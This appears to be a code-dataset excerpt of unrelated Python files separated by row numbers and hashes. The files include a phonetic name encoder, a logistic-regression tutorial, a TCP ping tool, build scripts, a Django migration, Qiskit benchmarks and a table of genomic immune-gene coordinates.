# french e.g. 'resnais', 'artois'
elif pos == last and st[pos - 2:pos] in ['AI', 'OI']:
nxt = ('', 'S', 1)
else:
nxt = ('S', )
if st[pos + 1] in ['S', 'Z']:
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'T':
if st[pos:pos + 4] == 'TION':
nxt = ('X', 3)
elif st[pos:pos + 3] in ['TIA', 'TCH']:
nxt = ('X', 3)
elif st[pos:pos + 2] == 'TH' or st[pos:pos + 3] == 'TTH':
# special case 'thomas', 'thames' or germanic
if st[pos + 2:pos + 4] in ['OM', 'AM'] or st[first:first + 4] in ['VON ', 'VAN '] \
or st[first:first + 3] == 'SCH':
nxt = ('T', 2)
else:
nxt = ('0', 'T', 2)
elif st[pos + 1] in ['T', 'D']:
nxt = ('T', 2)
else:
nxt = ('T', 1)
elif ch == 'V':
if st[pos + 1] == 'V':
nxt = ('F', 2)
else:
nxt = ('F', 1)
elif ch == 'W':
# can also be in middle of word
if st[pos:pos + 2] == 'WR':
nxt = ('R', 2)
elif pos == first and (st[pos + 1] in vowels or st[pos:pos + 2] == 'WH'):
# Wasserman should match Vasserman
if st[pos + 1] in vowels:
nxt = ('A', 'F', 1)
else:
nxt = ('A', 1)
# Arnow should match Arnoff
elif (pos == last and st[pos - 1] in vowels) \
or st[pos - 1:pos + 4] in ["EWSKI", "EWSKY", "OWSKI", "OWSKY"] \
or st[first:first + 3] == 'SCH':
nxt = ('', 'F', 1)
# polish e.g. 'filipowicz'
elif st[pos:pos + 4] in ["WICZ", "WITZ"]:
nxt = ('TS', 'FX', 4)
else: # default is to skip it
nxt = (None, 1)
elif ch == 'X':
# french e.g. breaux
nxt = (None, )
if not(pos == last and (st[pos - 3:pos] in ["IAU", "EAU"] \
or st[pos - 2:pos] in ['AU', 'OU'])):
nxt = ('KS', )
if st[pos + 1] in ['C', 'X']:
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
elif ch == 'Z':
# chinese pinyin e.g. 'zhao'
if st[pos + 1] == 'H':
nxt = ('J', )
elif st[pos + 1:pos + 3] in ["ZO", "ZI", "ZA"] \
or (is_slavo_germanic and pos > first and st[pos - 1] != 'T'):
nxt = ('S', 'TS')
else:
nxt = ('S', )
if st[pos + 1] == 'Z' or st[pos + 1] == 'H':
nxt = nxt + (2, )
else:
nxt = nxt + (1, )
# ----------------------------------
# --- end checking letters------
# ----------------------------------
#print str(nxt)
if len(nxt) == 2:
if nxt[0]:
pri += nxt[0]
sec += nxt[0]
pos += nxt[1]
elif len(nxt) == 3:
if nxt[0]:
pri += nxt[0]
if nxt[1]:
sec += nxt[1]
pos += nxt[2]
if pri == sec:
return (pri, '')
else:
return (pri, sec)
#}}}
|
991,643 | 75a4ca0c9e55c364889d5917dd7d6d040d74cd95 |
# http://blog.yhathq.com/posts/logistic-regression-and-python.html
import pandas as pd
import statsmodels.api as sm
import pylab as pl
import numpy as np
def cartesian(arrays, out=None):
"""
Generate a cartesian product of input arrays.
Parameters
----------
arrays : list of array-like
1-D arrays to form the cartesian product of.
out : ndarray
Array to place the cartesian product in.
Returns
-------
out : ndarray
2-D array of shape (M, len(arrays)) containing cartesian products
formed of input arrays.
Examples
--------
>>> cartesian(([1, 2, 3], [4, 5], [6, 7]))
array([[1, 4, 6],
[1, 4, 7],
[1, 5, 6],
[1, 5, 7],
[2, 4, 6],
[2, 4, 7],
[2, 5, 6],
[2, 5, 7],
[3, 4, 6],
[3, 4, 7],
[3, 5, 6],
[3, 5, 7]])
"""
arrays = [np.asarray(x) for x in arrays]
dtype = arrays[0].dtype
n = np.prod([x.size for x in arrays])
if out is None:
out = np.zeros([n, len(arrays)], dtype=dtype)
m = n / arrays[0].size
out[:, 0] = np.repeat(arrays[0], m)
if arrays[1:]:
cartesian(arrays[1:], out=out[0:m, 1:])
for j in range(1, arrays[0].size):
out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]
return out
# read the data in
# df = pd.read_csv("http://www.ats.ucla.edu/stat/data/binary.csv")
df = pd.read_csv("../../../r/stats/binary.csv")
# take a look at the dataset
print((df.head()))
# admit gre gpa rank
# 0 0 380 3.61 3
# 1 1 660 3.67 3
# 2 1 800 4.00 1
# 3 1 640 3.19 4
# 4 0 520 2.93 4
# rename the 'rank' column because there is also a DataFrame method called
# 'rank'
df.columns = ["admit", "gre", "gpa", "prestige"]
print((df.columns))
# array([admit, gre, gpa, prestige], dtype=object)
# dummify rank
dummy_ranks = pd.get_dummies(df['prestige'], prefix='prestige')
print(dummy_ranks.head())
# prestige_1 prestige_2 prestige_3 prestige_4
# 0 0 0 1 0
# 1 0 0 1 0
# 2 1 0 0 0
# 3 0 0 0 1
# 4 0 0 0 1
# create a clean data frame for the regression
cols_to_keep = ['admit', 'gre', 'gpa']
data = df[cols_to_keep].join(dummy_ranks.ix[:, 'prestige_2':])
print(data.head())
# admit gre gpa prestige_2 prestige_3 prestige_4
# 0 0 380 3.61 0 1 0
# 1 1 660 3.67 0 1 0
# 2 1 800 4.00 0 0 0
# 3 1 640 3.19 0 0 1
# 4 0 520 2.93 0 0 1
# manually add the intercept
data['intercept'] = 1.0
train_cols = data.columns[1:]
# Index([gre, gpa, prestige_2, prestige_3, prestige_4], dtype=object)
logit = sm.Logit(data['admit'], data[train_cols])
# fit the model
result = logit.fit()
# cool enough to deserve it's own gist
print(result.summary())
# look at the confidence interval of each coeffecient
print(result.conf_int())
# 0 1
# gre 0.000120 0.004409
# gpa 0.153684 1.454391
# prestige_2 -1.295751 -0.055135
# prestige_3 -2.016992 -0.663416
# prestige_4 -2.370399 -0.732529
# intercept -6.224242 -1.755716
# odds ratios and 95% CI
params = result.params
conf = result.conf_int()
conf['OR'] = params
conf.columns = ['2.5%', '97.5%', 'OR']
print(np.exp(conf))
# 2.5% 97.5% OR
# gre 1.000120 1.004418 1.002267
# gpa 1.166122 4.281877 2.234545
# prestige_2 0.273692 0.946358 0.508931
# prestige_3 0.133055 0.515089 0.261792
# prestige_4 0.093443 0.480692 0.211938
# intercept 0.001981 0.172783 0.018500
# instead of generating all possible values of GRE and GPA, we're going
# to use an evenly spaced range of 10 values from the min to the max
gres = np.linspace(data['gre'].min(), data['gre'].max(), 10)
print(gres)
# array([ 220. , 284.44444444, 348.88888889, 413.33333333,
# 477.77777778, 542.22222222, 606.66666667, 671.11111111,
# 735.55555556, 800. ])
gpas = np.linspace(data['gpa'].min(), data['gpa'].max(), 10)
print(gpas)
# array([ 2.26 , 2.45333333, 2.64666667, 2.84 , 3.03333333,
# 3.22666667, 3.42 , 3.61333333, 3.80666667, 4. ])
# enumerate all possibilities
combos = pd.DataFrame(cartesian([gres, gpas, [1, 2, 3, 4], [1.]]))
# recreate the dummy variables
combos.columns = ['gre', 'gpa', 'prestige', 'intercept']
dummy_ranks = pd.get_dummies(combos['prestige'], prefix='prestige')
dummy_ranks.columns = ['prestige_1', 'prestige_2', 'prestige_3', 'prestige_4']
# keep only what we need for making predictions
cols_to_keep = ['gre', 'gpa', 'prestige', 'intercept']
combos = combos[cols_to_keep].join(dummy_ranks.ix[:, 'prestige_2':])
# make predictions on the enumerated dataset
combos['admit_pred'] = result.predict(combos[train_cols])
print(combos.head())
# gre gpa prestige intercept prestige_2 prestige_3 prestige_4 admit_pred
# 0 220 2.260000 1 1 0 0 0 0.157801
# 1 220 2.260000 2 1 1 0 0 0.087056
# 2 220 2.260000 3 1 0 1 0 0.046758
# 3 220 2.260000 4 1 0 0 1 0.038194
# 4 220 2.453333 1 1 0 0
# 0 0.179574
def isolate_and_plot(variable, image_file):
# isolate gre and class rank
grouped = pd.pivot_table(combos, values=['admit_pred'], rows=[variable, 'prestige'],
aggfunc=np.mean)
# in case you're curious as to what this looks like
# print grouped.head()
# admit_pred
# gre prestige
# 220.000000 1 0.282462
# 2 0.169987
# 3 0.096544
# 4 0.079859
# 284.444444 1 0.311718
# make a plot
colors = 'rbgyrbgy'
for col in combos.prestige.unique():
plt_data = grouped.ix[grouped.index.get_level_values(1) == col]
pl.plot(plt_data.index.get_level_values(0), plt_data['admit_pred'],
color=colors[int(col)])
pl.xlabel(variable)
pl.ylabel("P(admit=1)")
pl.legend(['1', '2', '3', '4'], loc='upper left', title='Prestige')
pl.title("Prob(admit=1) isolating " + variable + " and presitge")
pl.show()
pl.savefig(image_file)
isolate_and_plot('gre', 'gre.png')
isolate_and_plot('gpa', 'gpa.png')
|
991,644 | cde85c40185b0c9aab24df850199076d549fda26 | import socket
import argparse
from resources import TCPing, Statistics, Visualiser, SocketAPI, Timer
import sys
import signal
def parse_args():
arg_parser = argparse.ArgumentParser(description='TCPing console app')
arg_parser.add_argument('dest_ip', metavar='dest_ip', type=check_ip,
help='Destination ip address')
arg_parser.add_argument(
'dest_port', metavar='dest_port',
type=check_non_negative_int, help='Destination port address')
arg_parser.add_argument(
'-t', '--timeout', type=check_non_negative_float,
default=3, help='Timeout for waiting packets')
arg_parser.add_argument(
'-p', '--packet', type=check_non_negative_int,
default=3, help='Count of packets')
arg_parser.add_argument(
'-i', '--interval', type=check_non_negative_float,
default=1, help='Packet sending interval')
arg_parser.add_argument(
'-u', '--unlimited', action='store_true',
help='Property for unlimited count of pings. '
'You can get statistics by SIGUSR1')
arg_parser.add_argument(
'-a', '--add', metavar=('HOST', 'PORT'),
nargs=2, action='append', help='Add another address for ping')
arg_parser.add_argument(
'-v', action='store_true', help='Shows time for every packet')
arg_parser.add_argument(
'-P', '--source_port', type=check_port, default=0,
help='source port for sending packets (default is 0)')
res = arg_parser.parse_args()
address = parse_additional_address(res.add)
address.append((res.dest_ip, res.dest_port))
return res, address
def check_port(port):
if not (0 <= int(port) <= 65535):
raise argparse.ArgumentTypeError
return int(port)
def check_ip(ip):
return socket.gethostbyname(ip)
def check_non_negative_int(value):
ivalue = int(value)
if ivalue < 0:
raise argparse.ArgumentTypeError(
f"{value} is an invalid positive int value")
return ivalue
def check_non_negative_float(value):
fvalue = float(value)
if fvalue < 0:
raise argparse.ArgumentTypeError(
f"{value} is an invalid positive float value")
return fvalue
def parse_additional_address(address_list):
parsed = []
if not address_list:
return parsed
for address in address_list:
try:
ip, port = parse_address(address)
parsed.append((ip, port))
except Exception:
sys.stderr.write(
'Wrong additional address {}'.format(' '.join(address)))
return parsed
def parse_address(address):
ip, port = address
ip = socket.gethostbyname(ip)
port = int(port)
if not (0 <= port <= 65535):
raise ValueError
return ip, port
if __name__ == "__main__":
if sys.platform == 'win32':
sys.stderr.write('Windows don\'t supported\n')
sys.exit(1)
parsed, address = parse_args()
source_port = parsed.source_port
if parsed.v:
visualiser = Visualiser.TimeVisualiser()
else:
visualiser = Visualiser.StreamVisualiser(parsed.timeout)
stats = Statistics.AddressStatManager(
(Statistics.PacketStatusStat, Statistics.MinTimeStat,
Statistics.MaxTimeStat, Statistics.AverageTimeStat))
sock = SocketAPI.SocketAPI()
timer = Timer.Timer()
program = TCPing.TCPing(
source_port,
address,
(parsed.packet, parsed.timeout, parsed.interval),
stats, visualiser, sock, timer, parsed.unlimited)
if parsed.unlimited:
signal.signal(signal.SIGUSR1, program.signal_handler)
program.send_and_receive_packets()
if not parsed.unlimited:
program.process_data()
|
991,645 | f5950fead522dcddb56d07b9dfbb8693a090f6bc | """
Implement stack
"""
class Stack(object):
"""stack class"""
def __init__(self, arg):
super(Stack, self).__init__()
self.arg = arg
def size(self):
self.ob |
991,646 | 056c2716a2e4bee85c6f9d50f3e3e33ec2f294f7 | r'''
__ _ _ _
/ _(_) | ___ (_) ___
| |_| | |/ _ \ | |/ _ \
| _| | | __/ | | (_) |
|_| |_|_|\___| |_|\___/
'''
##=============================================================================
## Generally
##=============================================================================
##
## See also: https://docs.python.org/3/tutorial/inputoutput.html
##
## Writing to text files is fairly easy in Python, provided you understand
## the 'open()' function.
##
## For general use cases, you will only need two arguments:
##
## open(file, mode)
##
## See also: https://docs.python.org/3/library/functions.html#open
# For example:
with open('static/_07_/utf8.txt', 'r') as f:
data = f.readlines()
for line in data:
print(line)
## Your filename argument can be:
## 1. A relative filename such as '../Documents'
## 2. An absolute filename such as 'C:\Users\USERNAME\Documents\file.txt'
## 3. A file-like object or abstraction
##
## Your open type argument can be:
##
## 1. 'r' for reading
## 2. 'w' for writing
## 3. 'a' for appending
##
## And the mode argument can have the following modifiers:
## 1. 'b' for binary (such as 'wb' to write a binary file)
## 2. '+' for opening a disk file (such as 'w+' to create and write).
## 3. 'x' for creating and failing if file exists.
## 4. 't' for text files (the default)
##
## There can also be combinations ...
with open('static/_07_/new_binary', 'wb+') as f:
f.write(bytearray([0xa1, 0xb2, 0xc3, 0xd4, 0xe5, 0xf6]))
## Other common arguments are 'encoding' and 'errors'
##
## Python defaults to utf-8 encoding, which necessarily covers ASCII.
## Other encodings, however, such as the Windows CP-1252 or Latin 1
## require explicit coversion.
with open('static/_07_/cp1252.txt', encoding='cp1252') as f:
print(f.read())
## If you anticipate encoding errors, you can specify what is done
## with any errors:
with open('static/_07_/cp1252.txt', encoding='ascii', errors='replace') as f:
print(f.read())
with open('static/_07_/cp1252.txt', encoding='ascii', errors='ignore') as f:
print(f.read())
with open('static/_07_/cp1252.txt', encoding='ascii', errors='strict') as f:
print(f.read())
## Side note: for asynchonous IO, like file watchers see the 'asyncio' module.
##
##=============================================================================
## Abstractions
##=============================================================================
##
## You do not necessarily need to read from a file. For example,
## it is often more efficient to download something to RAM and then
## wrap it in a file like abstraction.
import io
# Create empty bytes IO.
file_like_object_bin = io.BytesIO()
# Create file like object
file_like_object_txt = io.StringIO('String file-like object.')
# Side note, you can nest if absolutely necessary.
# Open StringIO
with file_like_object_txt as f1:
# Open BytesIO
with file_like_object_bin as f2:
# Read StringIO
print(f1.read())
# Write binary data, seek to zero, read data, and print.
f2.write(bytearray([1, 1, 2, 3, 5, 8, 13, 21, 34, 55]))
f2.seek(0)
print(f2.read())
##=============================================================================
## Questions
##=============================================================================
|
991,647 | b1d1ab238bc67bf799999d59513e1a4db11a8506 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import autotools, shelltools, get
shelltools.export('HAVE_VALGRIND_TRUE', '#')
shelltools.export('HAVE_VALGRIND_FALSE', '')
def setup():
gtk_version = 2 if get.buildTYPE() == 'gtk2' else 3
autotools.configure(' '.join([
'--disable-dumper',
'--disable-static',
'--disable-tests',
'--with-gtk=%s' % gtk_version
]))
def build():
autotools.make()
def install():
autotools.rawInstall('-j1 -C libdbusmenu-glib DESTDIR=%s' % get.installDIR())
autotools.rawInstall('-j1 -C libdbusmenu-gtk DESTDIR=%s' % get.installDIR())
|
991,648 | f4e16668662d49b0ea12a76040d1a5d16fc260ea | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory.
"""
from googleads import adwords
import _locale
import pandas as pd
import io
from datetime import datetime
_locale._getdefaultlocale = (lambda *args: ['en_US', 'UTF-8']) # change encoding
def main(client):
# Initialize service.
report_downloader = client.GetReportDownloader(version='v201809')
output= io.StringIO()
# Create report query.
report_query = (adwords.ReportQueryBuilder()
.Select("AccountDescriptiveName","CampaignId","AdGroupId","Id","Headline","HeadlinePart1","HeadlinePart2","ShortHeadline","LongHeadline","CreativeFinalUrls","ImageCreativeName","Description","Description1","Description2","DisplayUrl","Path1","Path2","BusinessName","Status","AdGroupStatus","CampaignStatus","CombinedApprovalStatus","AdType","Labels","Impressions","Interactions","InteractionRate","AverageCost",
"Cost","VideoQuartile100Rate","Clicks","AveragePosition","Conversions","Date")
.From('AD_PERFORMANCE_REPORT')#startdate,enddate missing
#.Where('Campaign_status').In('ENABLED', 'PAUSED')
.During('LAST_7_DAYS')
.Build())
#print(report_query)
# You can provide a file object to write the output to..
#output= io.StringIO()
report_downloader.DownloadReportWithAwql(
report_query,'TSV',output, skip_report_header=True, #tab delimited
skip_column_header=True, skip_report_summary=False,
include_zero_impressions=True)
output.seek(0)
types= {'Cost':pd.np.float64,'Conversions': pd.np.str ,'Avg.Cost': pd.np.float64} # Change datatype.
cols=["Account","Campaign ID","Ad group ID","Ad ID","Headline","Headline 1","Headline 2" ,"Short headline","Long headline","Ad final URL","Image ad name","Description","Description 1","Description 2","Display URL",
"Path 1","Path 2","Business name","Ad status","Adgroup Status","Campaign Status","CombinedApprovalStatus","Ad type","Labels on Ad","Impressions","Interactions","InteractionRate","Avg. Cost","Cost"
,"Video played to 100%","Clicks","Avg. position","Conversions","Date"]
df = pd.read_csv(output,dtype=types,sep="\t",low_memory=False, na_values=[' --'],names=cols)
# print(df.head())
df['Cost']=df.Cost/1000000
df['Avg. Cost']= df['Avg. Cost']/1000000
df['Ad']=df.Headline
df.drop(df.tail(1).index,inplace=True) # drop footer
df.to_csv('AdPerformaceReport-%s.csv'%datetime.now().strftime('%Y%m%d%H%M%S'),index=False,sep="\t") # export to default working directory
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage() # Config file from default location
main(adwords_client) |
991,649 | c46efbb689e3a27b87c7f1fc47b94b997795150d | def answer(n):
count = 0
n = int(n)
while n != 1:
if n&1 == 0 or n == 4:
n = n >> 1
elif ((n-1)>>1)&1 == 0 or n == 3:
n -= 1
else:
n += 1
count += 1
return count
if __name__ == "__main__":
print answer("4") == 2
print answer("15") == 5
print answer("13") == 5
print answer("9") == 4
print answer("2") == 1
print answer("1") == 0
|
991,650 | 98bdff59e1425ed2654ef42b918ef417f43d1c81 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-09-30 08:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('comment', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='edited_count',
field=models.IntegerField(default=0),
),
]
|
991,651 | f1afbb2977e4eb21105ab41f75f1f65b5272286b | #! /usr/bin/python
from dircache import listdir
from re import compile,match
from optparse import OptionParser
from time import mktime,localtime
import sys
xmlpattern = compile("^.*\.xml")
extractpattern = compile("^.*\+(.*)\+s(.*),_(.*),_(.*),_(.*),_(.*),_(.*),_(.*),_(.*),_(.*)e.*")
intpattern = compile("^(.*)\..*")
datafilesuffix = ""
gnuplotfilesuffix = "_rss.gnuplot"
def parsecmdl():
error = False
""" parse commandline """
parser = OptionParser()
parser.add_option('--dir',action='store',type='string',dest='dir')
(options,args) = parser.parse_args()
if options.dir == None:
print "Please give direcory in '--dir='"
error = True
if error == True:
sys.exit(1)
return (options,args)
def extractInfo(ts_file):
""" Extracts event- and timeinfo.
"""
match = extractpattern.match(file)
event = int(match.group(1))
time = int(match.group(2)),int(match.group(3)),int(match.group(4)),int(match.group(5)),int(match.group(6)),\
int(match.group(7)),int(match.group(8)),int(match.group(9)),int(match.group(10))
secs = int(intpattern.match(str(mktime(time))).group(1))
return (event,secs)
""" main """
(options,args) = parsecmdl()
files = listdir(options.dir)
gnuplotdatafilename = options.dir + "/" + options.dir + datafilesuffix
gnuplotcommandsfilename = options.dir + "/" + options.dir + gnuplotfilesuffix
""" insert all events """
maxevent = 0
events = {}
for file in files:
if xmlpattern.match(file) != None:
(event,time) = extractInfo(file)
events[event] = time
if event > maxevent:
maxevent = event
gnuplotdatafile = open(gnuplotdatafilename,'w')
if len(events) > 0:
startingmillis = events[1]
startinghour = localtime(startingmillis)[3]
startingsecs = localtime(startingmillis)[4]
else:
sys.exit()
""" time in minutes """
for event in range(1,maxevent+1):
gnuplotdatafile.write(str((events[event] - startingmillis) / 3600.0) + " " + str(event) + "\n")
gnuplotdatafile.close()
gnuplotcommandsfile = open(gnuplotcommandsfilename,'w')
gnuplotcommandsfile.write("unset parametric\n")
gnuplotcommandsfile.write("set xlabel \"time/hrs -- starttime (CEST): " + str(startinghour) + ":" + str(startingsecs) + "h\"\n")
gnuplotcommandsfile.write("set ylabel \"events\"\n")
gnuplotcommandsfile.write("plot '" + gnuplotdatafilename + "' w lp\n")
gnuplotcommandsfile.close()
|
991,652 | 3b3df1d27bd921366747dc6bbc888c5a79951e1e | import logging
from cmreslogging.handlers import CMRESHandler
handler = CMRESHandler(hosts=[{'host': 'localhost', 'port': 9200}],
auth_type=CMRESHandler.AuthType.NO_AUTH,
es_index_name="my_python_index")
logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')
log = logging.getLogger("PythonTest")
log.setLevel(logging.INFO)
log.addHandler(handler)
|
991,653 | c36c34fe39bcc8ba58dadac6231e1387ca0c4ec7 | import clr;
from System import Array, String
from System.ComponentModel import TypeConverter, StringConverter
# Connection settings
class Connection(object) :
DisplayName = 'connection'
Category = 'Connection'
Description = 'Serial number of the main phone.'
DefaultValue = ''
ReadOnlyForUser = True
class TraceConnection(object) :
DisplayName = 'trace connection'
Category = 'Connection'
Description = 'Trace connection; If defined, trace log will be taken from main phone during test run'
DefaultValue = ''
ReadOnlyForUser = True
# Phone settings
class SecurityCode(object) :
DisplayName = 'security code'
Category = 'Phone'
Description = 'Security code of the phone\nAccess path: Main.SecurityCode'
DefaultValue = ''
class BluetoothName(object) :
DisplayName = 'bluetooth name'
Category = 'Phone'
Description = 'Bluetooth name\nAccess path: Main.BluetoothName'
DefaultValue = ''
class WLANName(object) :
DisplayName = '1st WLAN name'
Category = 'WLAN'
Description = 'WLAN SSID name\nAccess path: Main.WLANName'
DefaultValue = ''
class WLANPassword(object) :
DisplayName = '1st WLAN password'
Category = 'WLAN'
DefaultValue = ''
Description = 'Password for the WLAN network\nAccess path: Main.WLANPassword'
class WLANName2(object) :
DisplayName = '2nd WLAN name'
Category = 'WLAN'
Description = 'Second WLAN SSID name\nAccess path: Main.WLANName2'
DefaultValue = ''
class WLANPassword2(object) :
DisplayName = '2nd WLAN password'
Category = 'WLAN'
DefaultValue = ''
Description = 'Password for the second WLAN network\nAccess path: Main.WLANPassword2'
# SIM1 settings
class SIM1PhoneNumber(object) :
DisplayName = 'phone number'
Category = 'SIM1'
Description = 'Phone number (in format 045123456 or +35845123456)\nAccess path: Main.SIM1PhoneNumber'
DefaultValue = ''
class SIM1PinCode(object) :
DisplayName = 'pin code'
Category = 'SIM1'
Description = 'Access path: Main.SIM1PinCode'
DefaultValue = ''
class SIM1Pin2Code(object) :
DisplayName = 'pin2 code'
Category = 'SIM1'
Description = 'Access path: Main.SIM1Pin2Code'
DefaultValue = ''
class SIM1Puk1Code(object) :
DisplayName = 'puk1 code'
Category = 'SIM1'
Description = 'Access path: Main.SIM1Puk1Code'
DefaultValue = ''
class SIM1Puk2Code(object) :
DisplayName = 'puk2 code'
Category = 'SIM1'
Description = 'Access path: Main.SIM1Puk2Code'
DefaultValue = ''
class SIM1ServiceNumber(object) :
DisplayName = 'service number'
Category = 'SIM1'
Description = 'Access path: Main.SIM1ServiceNumber'
DefaultValue = ''
class SIM1VoiceMailNumber(object) :
DisplayName = 'voice mail number'
Category = 'SIM1'
Description = 'Access path: Main.SIM1VoiceMailNumber'
DefaultValue = ''
# SIM2 settings
class SIM2PhoneNumber(object) :
DisplayName = 'phone number'
Category = 'SIM2'
Description = 'Phone number (in format 045123456 or +35845123456)\nAccess path: Main.SIM2PhoneNumber'
DefaultValue = ''
class SIM2PinCode(object) :
DisplayName = 'pin code'
Category = 'SIM2'
Description = 'Access path: Main.SIM2PinCode'
DefaultValue = ''
class SIM2Pin2Code(object) :
DisplayName = 'pin2 code'
Category = 'SIM2'
Description = 'Access path: Main.SIM2Pin2Code'
DefaultValue = ''
class SIM2Puk1Code(object) :
DisplayName = 'puk1 code'
Category = 'SIM2'
Description = 'Access path: Main.SIM2Puk1Code'
DefaultValue = ''
class SIM2Puk2Code(object) :
DisplayName = 'puk2 code'
Category = 'SIM2'
Description = 'Access path: Main.SIM2Puk2Code'
DefaultValue = ''
class SIM2ServiceNumber(object) :
DisplayName = 'service number'
Category = 'SIM2'
Description = 'Access path: Main.SIM2ServiceNumber'
DefaultValue = ''
class SIM2VoiceMailNumber(object) :
DisplayName = 'voice mail number'
Category = 'SIM2'
Description = 'Access path: Main.SIM2VoiceMailNumber'
DefaultValue = ''
|
991,654 | 5cb3a2df2693ea4d511b5d3dd38600def11d8249 | # -*- coding: utf-8 -*
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=missing-docstring,invalid-name,no-member
# pylint: disable=attribute-defined-outside-init
import itertools
from qiskit import QuantumRegister, QuantumCircuit
from qiskit.circuit import Parameter
def build_circuit(width, gates):
qr = QuantumRegister(width)
qc = QuantumCircuit(qr)
while len(qc) < gates:
for k in range(width):
qc.h(qr[k])
for k in range(width-1):
qc.cx(qr[k], qr[k+1])
return qc
class CircuitConstructionBench:
params = ([1, 2, 5, 8, 14, 20], [8, 128, 2048, 8192, 32768, 131072])
param_names = ['width', 'gates']
timeout = 600
def setup(self, width, gates):
self.empty_circuit = build_circuit(width, 0)
self.sample_circuit = build_circuit(width, gates)
def time_circuit_construction(self, width, gates):
build_circuit(width, gates)
def time_circuit_extend(self, _, __):
self.empty_circuit.extend(self.sample_circuit)
def time_circuit_copy(self, _, __):
self.sample_circuit.copy()
def build_parameterized_circuit(width, gates, param_count):
params = [Parameter('param-%s' % x) for x in range(param_count)]
param_iter = itertools.cycle(params)
qr = QuantumRegister(width)
qc = QuantumCircuit(qr)
while len(qc) < gates:
for k in range(width):
param = next(param_iter)
qc.u2(0, param, qr[k])
for k in range(width-1):
param = next(param_iter)
qc.crx(param, qr[k], qr[k+1])
return qc, params
class ParameterizedCircuitConstructionBench:
params = ([20], [8, 128, 2048, 8192, 32768, 131072],
[8, 128, 2048, 8192, 32768, 131072])
param_names = ['width', 'gates', 'number of params']
timeout = 600
def setup(self, _, gates, params):
if params > gates:
raise NotImplementedError
def time_build_parameterized_circuit(self, width, gates, params):
build_parameterized_circuit(width, gates, params)
class ParameterizedCircuitBindBench:
params = ([20], [8, 128, 2048, 8192, 32768, 131072],
[8, 128, 2048, 8192, 32768, 131072])
param_names = ['width', 'gates', 'number of params']
timeout = 600
def setup(self, width, gates, params):
if params > gates:
raise NotImplementedError
self.circuit, self.params = build_parameterized_circuit(width,
gates,
params)
def time_bind_params(self, _, __, ___):
self.circuit.bind_parameters({x: 3.14 for x in self.params})
|
991,655 | 7a0e8619e858492e5c985a1b5b0a982a56e0b62c |
Sighv={
'IGHV3OR15':(238-537), # Scaffold1099214757507
'IGHV3-23':(797-1845), # Scaffold1099214148171
'IGHV3-72':(700393-701553), # Scaffold1099548049584
'IGHV3-7': (654699-654992), # Scaffold1099548049584
'IGHV3-49':(187218-187895) # Scaffold1099548049584
}
#Chr10: Lambda
Siglv={
'IGLV5-52':(66038886-66039290),
'IGLV7-46':(66222287-66222580),
'IGLV9-49':(66252992-66253527),
'IGLV1-51':(66335879-66336272),
'IGLV5-45':(66226801-66227112),
'IGLV11-55':(65906638-65906946),
'IGLV10-54':(65929928-65930221),
'IGLV8-61':(65803593-65803889)
}
#Chr13 Kappa
Sigkv={
'IGKV4-1': (89436957,89437895),
'IGKV1-27':(90246706,90247293),
'IGKV2D-2':(113209235,113209678),
'IGKV3-20':(89827964,89828257)
}
#Chr7: TRAV
Strav = {
'TRAV14DV4':(84639642,84640144),
'TRAV8-6':(84695438,84695874),
'TRAV40':(85118821,85119249),
'TRAV30':(84991102,84991653),
'TRAV25':(84934218,84934823),
'TRAV6':(84496390,84496913),
'TRAV5':(84486442,84486950),
'TRAV4':(84467455,84468214),
'TRAV27':(84971778,84972336),
'TRAV17':(84716663,84717140),
'TRAV19':(84732052,84732598),
'TRAV8-4':(84564285,84564755),
'TRAV41':(85125178,85125679),
'TRAV22': (1261,1818), # Scaffold1099214732309
'TRAV23DV6': (627,1136) #Scaffold1099214128018:
}
#chr3: trbv
Strbv={
'TRBV11-3':(180086601,180112240),
'TRBV5-6':(179988975,179989609),
'TRBV5-4':(179951177,179951702),
'TRBV5-3':(179877783,179878247),
'TRBV5-1':(179805555,179806016),
'TRBV11-1':(179921910,179922345),
'TRBV18':(180168975,180169600),
'TRBV13':(180093458,180093897)
}
# -------------------------------
### determine the scaffolds...
Vext_ighv={
'Vs155':1482, #scaffold:MMUL_1:1099548049584
'Vs157':38589, #.
'Vs158':48226,
'Vs159':55680,
'Vs160':64967,
'Vs161':97734,
'Vs162':146617,
'Vs163':175855,
'Vs164':187206,
'Vs165':203923,
'Vs166':290356,
'Vs167':294318,
'Vs168':331177,
'Vs169':439323,
'Vs170':477121,
'Vs171':491717,
'Vs172':520616,
'Vs173':565606,
'Vs174':593374,
'Vs175':601142,
'Vs176':604651,
'Vs177':613004,
'Vs178':654687,
'Vs179':661967,
'Vs180':700541,
'Vs181':716255,
'Vs182':725596,
'Vs183':759510,
'Vs185':227, #scaffold:MMUL_1:1099214757507:
'Vs191':1856 #scaffold:MMUL_1:1099214148171
}
# Chr13
Vext_igkv={
'Vs37':377093,
'Vs38':429921,
'Vs39':466829,
'Vs40':497324,
'Vs41':520019,
'Vs42':528120,
'Vs43':536211,
'Vs44':561293,
